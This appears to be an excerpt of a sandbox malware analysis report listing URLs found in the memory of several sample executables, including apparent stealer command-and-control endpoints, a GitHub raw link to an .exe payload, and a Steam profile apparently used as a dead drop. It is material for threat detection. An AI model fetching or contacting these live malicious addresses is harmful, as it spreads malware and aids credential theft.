                                Source: skotes.exe, 00000003.00000002.7285940039.0000000001390000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000003.5971400666.0000000001402000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7286155793.0000000001402000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Urijas/moperats/raw/refs/heads/main/jthjjdweajtujhjad.exe
                                Source: D1UL0FG.exe, 00000006.00000002.2990539732.000001FA2D81C000.00000004.00001000.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2473137988.000001FA2BFD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
                                Source: D1UL0FG.exe, 00000006.00000003.2473163924.000001FA2BF7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
                                Source: D1UL0FG.exe, 00000006.00000002.2989919313.000001FA2BF31000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2473137988.000001FA2BFD8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2473163924.000001FA2BF7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
                                Source: D1UL0FG.exe, 00000006.00000002.2989919313.000001FA2BF31000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2473137988.000001FA2BFD8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2473163924.000001FA2BF7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
                                Source: D1UL0FG.exe, 00000006.00000002.2996941109.000001FA2E830000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
                                Source: D1UL0FG.exe, 00000006.00000003.2581019615.000001FA2E2A8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2552764797.000001FA2E2AF000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000002.2993719449.000001FA2E2AF000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2490431085.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
                                Source: D1UL0FG.exe, 00000006.00000003.2537713866.000001FA2E3D8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2538084119.000001FA2E3E2000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000002.2997186323.000001FA2E940000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
                                Source: D1UL0FG.exe, 00000006.00000002.2997434338.000001FA2EA70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/3290
                                Source: skotes.exe, 00000003.00000003.5971400666.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7286155793.00000000013E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.comX
                                Source: powershell.exe, 00000037.00000002.2645286273.0000021F951A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                                Source: D1UL0FG.exe, 00000006.00000002.2992431014.000001FA2DF30000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000002.2992431014.000001FA2DFF8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2537129441.000001FA2DFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                                Source: D1UL0FG.exe, 00000006.00000003.2581019615.000001FA2E2A8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2552764797.000001FA2E2AF000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000002.2993719449.000001FA2E2AF000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000002.2992431014.000001FA2DF30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail
                                Source: D1UL0FG.exe, 00000006.00000002.2992431014.000001FA2DF30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail/
                                Source: D1UL0FG.exe, 00000006.00000003.2481469057.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com/generate_204
                                Source: 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                                Source: 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                                Source: D1UL0FG.exe, 00000006.00000002.2992431014.000001FA2DF30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/
                                Source: D1UL0FG.exe, 00000006.00000003.2537129441.000001FA2DFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/
                                Source: 8ZVMneG.exe, 00000054.00000003.2800061103.00000000012D3000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2825806883.00000000012D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://immureprech.biz/api
                                Source: 8ZVMneG.exe, 00000054.00000003.2800061103.00000000012D3000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2825806883.00000000012D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://immureprech.biz/apif
                                Source: 8ZVMneG.exe, 00000054.00000003.2888906817.0000000003BCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                                Source: D1UL0FG.exe, 00000006.00000002.2994686115.000001FA2E430000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://json.org
                                Source: 8ZVMneG.exe, 00000054.00000003.2941333004.0000000001302000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/
                                Source: 8ZVMneG.exe, 00000054.00000003.3041963301.0000000001302000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000002.3044924164.0000000001302000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com//
                                Source: 8ZVMneG.exe, 00000054.00000003.2825806883.0000000001308000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2798581699.0000000001308000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/5
                                Source: 8ZVMneG.exe, 00000054.00000003.3041963301.0000000001302000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000002.3044924164.0000000001302000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/;
                                Source: 8ZVMneG.exe, 00000054.00000002.3044924164.0000000001302000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2940333141.0000000001302000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000002.3045357571.0000000001365000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2825806883.0000000001308000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2798581699.0000000001308000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2941333004.0000000001302000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api
                                Source: 8ZVMneG.exe, 00000054.00000003.2826664666.0000000001308000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2825806883.0000000001308000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apiG
                                Source: 8ZVMneG.exe, 00000054.00000003.2826664666.0000000001308000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2825806883.0000000001308000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apiN
                                Source: 8ZVMneG.exe, 00000054.00000003.3041963301.0000000001302000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000002.3044924164.0000000001302000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apialif_
                                Source: 8ZVMneG.exe, 00000054.00000003.3041726825.0000000001363000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000002.3045357571.0000000001365000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apih0Y
                                Source: 8ZVMneG.exe, 00000054.00000003.2941333004.0000000001302000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apil
                                Source: 8ZVMneG.exe, 00000054.00000003.2826664666.0000000001308000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2825806883.0000000001308000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/e
                                Source: 8ZVMneG.exe, 00000054.00000003.3041963301.0000000001302000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000002.3044924164.0000000001302000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/eK
                                Source: 8ZVMneG.exe, 00000054.00000003.3041963301.0000000001302000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000002.3044924164.0000000001302000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/om
                                Source: 8ZVMneG.exe, 00000054.00000003.3041963301.0000000001302000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000002.3044924164.0000000001302000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2800061103.00000000012D3000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2825806883.00000000012D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi
                                Source: 8ZVMneG.exe, 00000054.00000003.2826664666.0000000001308000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2825806883.0000000001308000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/piu
                                Source: 8ZVMneG.exe, 00000054.00000003.3041963301.0000000001302000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000002.3044924164.0000000001302000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/rtner.-K
                                Source: 8ZVMneG.exe, 00000054.00000003.2800061103.00000000012D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/u/
                                Source: 8ZVMneG.exe, 00000054.00000003.2991447844.0000000003BD5000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.3042502917.0000000003BD5000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000002.3047482632.0000000003BD5000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.3016986750.0000000003BD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/apiVm%2FJ0rmsy%2BhN1oSL3JKRhoJXC4AvQ6UHJ%2BO6lT%2FGF727v%2B49o4tEmttjRuu
                                Source: 8ZVMneG.exe, 00000054.00000003.2912967737.0000000003BD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/apil
                                Source: D1UL0FG.exe, 00000006.00000002.2997976129.000001FA2ED28000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                                Source: D1UL0FG.exe, 00000006.00000002.2997976129.000001FA2ED4C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com
                                Source: 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                                Source: 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001351000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2799816087.0000000001354000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                                Source: 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001351000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2799816087.0000000001354000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                                Source: powershell.exe, 00000011.00000002.2798190076.0000028A95663000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2733086227.0000021FA472A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2733086227.0000021FA45E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2645286273.0000021F95ED9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                                Source: powershell.exe, 00000037.00000002.2645286273.0000021F95CD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                                Source: powershell.exe, 00000037.00000002.2645286273.0000021F95CD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                                Source: D1UL0FG.exe, 00000006.00000002.2997434338.000001FA2EA70000.00000004.00001000.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2490171634.000001FA2E40D000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000002.2997186323.000001FA2E940000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/specifications/entry-points/
                                Source: d0ef52de9f.exe, 0000005F.00000003.3030418791.00000000012D9000.00000004.00000020.00020000.00000000.sdmp, d0ef52de9f.exe, 0000005F.00000003.2935690234.00000000037AE000.00000004.00000800.00020000.00000000.sdmp, d0ef52de9f.exe, 0000005F.00000003.3051592972.00000000012CC000.00000004.00000020.00020000.00000000.sdmp, d0ef52de9f.exe, 0000005F.00000003.3051592972.00000000012D9000.00000004.00000020.00020000.00000000.sdmp, d0ef52de9f.exe, 0000005F.00000003.3051391317.0000000001338000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/
                                Source: d0ef52de9f.exe, 0000005F.00000003.2934892594.00000000012D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/.
                                Source: d0ef52de9f.exe, 0000005F.00000003.2883853328.00000000037AE000.00000004.00000800.00020000.00000000.sdmp, d0ef52de9f.exe, 0000005F.00000003.2883199169.00000000037AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/R
                                Source: d0ef52de9f.exe, 0000005F.00000003.3030418791.00000000012D9000.00000004.00000020.00020000.00000000.sdmp, d0ef52de9f.exe, 0000005F.00000003.2960034570.0000000001338000.00000004.00000020.00020000.00000000.sdmp, d0ef52de9f.exe, 0000005F.00000003.2913864294.0000000001346000.00000004.00000020.00020000.00000000.sdmp, d0ef52de9f.exe, 0000005F.00000003.3051592972.00000000012CC000.00000004.00000020.00020000.00000000.sdmp, d0ef52de9f.exe, 0000005F.00000003.2983504881.0000000001331000.00000004.00000020.00020000.00000000.sdmp, d0ef52de9f.exe, 0000005F.00000003.3051592972.00000000012D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/api
                                Source: d0ef52de9f.exe, 0000005F.00000003.3051592972.00000000012CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/apiP
                                Source: d0ef52de9f.exe, 0000005F.00000003.3051592972.00000000012CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/apiu
                                Source: d0ef52de9f.exe, 0000005F.00000003.2983504881.0000000001331000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/api~
                                Source: d0ef52de9f.exe, 0000005F.00000003.3051592972.00000000012CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/jh
                                Source: d0ef52de9f.exe, 0000005F.00000003.3051391317.0000000001338000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/pi
                                Source: d0ef52de9f.exe, 0000005F.00000003.3051391317.0000000001338000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/pib
                                Source: 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001351000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2799816087.0000000001354000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                                Source: D1UL0FG.exe, 00000006.00000002.3005171596.00007FF8A8E0F000.00000040.00000001.01000000.0000000B.sdmpString found in binary or memory: https://python.org/dev/peps/pep-0263/
                                Source: D1UL0FG.exe, 00000006.00000002.2993365618.000001FA2E130000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png
                                Source: D1UL0FG.exe, 00000006.00000003.2481469057.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngz
                                Source: 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001351000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                                Source: 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001351000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2799816087.0000000001354000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                                Source: 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001351000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                                Source: skotes.exe, 00000003.00000002.7286155793.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7286155793.0000000001402000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sci.libertyreserve.com/
                                Source: skotes.exe, 00000003.00000003.5971400666.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7284592983.0000000001310000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7286155793.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7285940039.0000000001390000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469091963.0000027326162000.00000004.00000020.00020000.00000000.sdmp, d0ef52de9f.exe, 0000005D.00000002.2765729301.0000000000A82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                                Source: 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001351000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2799816087.0000000001354000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                                Source: 8ZVMneG.exe, 00000054.00000003.2826664666.0000000001308000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2825806883.0000000001308000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2798581699.0000000001308000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sordid-snaked.cyou/api
                                Source: 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001351000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                                Source: 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001351000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2799816087.0000000001354000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                                Source: 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001351000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                                Source: 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001351000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2799816087.0000000001354000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                                Source: 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                                Source: 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                                Source: 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                                Source: 8ZVMneG.exe, 00000054.00000003.2825503238.000000000136C000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2799816087.000000000136C000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                                Source: 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                                Source: 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                                Source: 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                                Source: 8ZVMneG.exe, 00000054.00000003.2798581699.0000000001308000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
                                Source: 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                                Source: 8ZVMneG.exe, 00000054.00000003.2825503238.000000000136C000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2799816087.000000000136C000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                                Source: 8ZVMneG.exe, 00000054.00000003.2798581699.0000000001308000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/765611997243319003
                                Source: 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                                Source: 8ZVMneG.exe, 00000054.00000003.2800061103.00000000012CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900
                                Source: 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                                Source: 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001351000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2799816087.0000000001354000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                                Source: 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001351000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
                                Source: 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                                Source: 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                                Source: 8ZVMneG.exe, 00000054.00000003.2825503238.000000000136C000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2799816087.000000000136C000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                                Source: 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                                Source: 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                                Source: 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                                Source: 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                                Source: 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                                Source: 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                                Source: 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                                Source: D1UL0FG.exe, 00000006.00000003.2589318835.000001FA2E686000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
                                Source: 8ZVMneG.exe, 00000054.00000003.2885763363.0000000003C7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                                Source: D1UL0FG.exe, 00000006.00000003.2581019615.000001FA2E2A8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2541116191.000001FA2E65D000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2552764797.000001FA2E2AF000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2542837368.000001FA2E6BB000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2527409426.000001FA2E6AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefox
                                Source: 8ZVMneG.exe, 00000054.00000003.2885763363.0000000003C7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                                Source: D1UL0FG.exe, 00000006.00000003.2562812810.000001FA2E5A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
                                Source: D1UL0FG.exe, 00000006.00000002.2992431014.000001FA2DF30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
